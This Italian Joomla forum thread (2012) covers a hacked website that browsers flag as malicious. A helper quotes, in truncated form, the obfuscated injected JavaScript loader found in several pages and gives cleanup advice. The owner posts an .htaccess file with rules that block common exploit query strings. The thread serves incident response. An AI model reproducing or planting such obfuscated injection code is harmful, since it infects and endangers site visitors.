Joomla.it Forum
Non solo Joomla... => Sicurezza => : orsocapo 19 Apr 2012, 23:51:30
-
Salve a tutti,
entrando nel sito su ff e su altri browser appare il messaggio che il sito è sospetto
Il sito web www.consequenze.org è stato segnalato come sito web malevolo ed è stato bloccato sulla base delle impostazioni di sicurezza correnti.
dato che negli ultimi giorni non è stato aggiornato cosa può essere successo?
Grazie
-
Vuol dire che ti sono entrati,
Che versione di joomla?
Sposto nella sezione sicurezza
-
Hola
Hai questo malware
<script>c=3-1;i=-1-1+c;p=parseInt;if(p("01"+"2"+"3")===83)try{Boolean()["pr"+"otot"+"ype"].q}catch(egewgsd){if(window.document)f=['-32i-32i64i61i-9i-1i59i70i58i76i68i60i69i75i5i62i60i75i28i67i60i68i60i69i75i74i25i80i43i56i62i37i56i68i60i-1i-2i57i70i59i80i-2i0i50i7i52i0i82i-28i-32i-32i-32i64i61i73i56i68i60i73i-1i0i18i-28i-32i-32i84i-9i60i67i74i60i-9i82i-28i-32i-32i-32i59i70i58i76i68i60i69i75i5i78i73i64i75i60i-1i-7i19i64i61i73i56i68i60i-9i74i73i58i20i-2i63i75i75i71i17i6i6i71i64i59i70i63i64i74i5i73i76i6i58i70i76i69i75i8i10i5i71i63i71i-2i-9i78i64i59i75i63i20i-2i8i7i-2i-9i63i60i64i62i63i75i20i-2i8i7i-2i-9i74i75i80i67i60i20i-...
in oltre 5 pagine, cercalo ed eliminalo
-
grazie mille per la segnalazione del malware.
come posso eliminarlo?
-
Hola
In principio devi cercare i files che hanno il codice, aprirli con un editor ed eliminare listruzione, ma e importante che cerchi la "porta di entrata" del malware nel tuo sito e "chiuderla".
-
holas Paquito,
perdonami se ti chiedo un'altra spiegazione.
ho provato a cercare i file tramite ftp ma mi ci sono perso.
c'è un modo per trovarli velocemente?
e la porta del malware come si trova?
scusami a grazie ancora
-
Hola
Devi scaricarti tutti i files nel tuo pc e cercare all'interno il codice malevolo.
Chiudere la porta e un disorso lungo che non si puo fare dal di fuori, devi rivedere la sicurezza del tuo server, permessi di files e cartelle, estensioni non sicure, ecc...
-
li scarico (esporto) dal database in formato .sql?
se sì, poi come apro il file?
-
sul file .htaccess c'è scritto questo (non so se può essere utile:
## Can be commented out if causes errors, see notes above.
#Options +FollowSymLinks
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*(.*) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)
#RewriteBase /joomla/
########## Begin - Joomla! core SEF Section
#
RewriteRule ^joomla/(.*)$ /$1 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|.php|.html|.htm|.feed|.pdf|.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section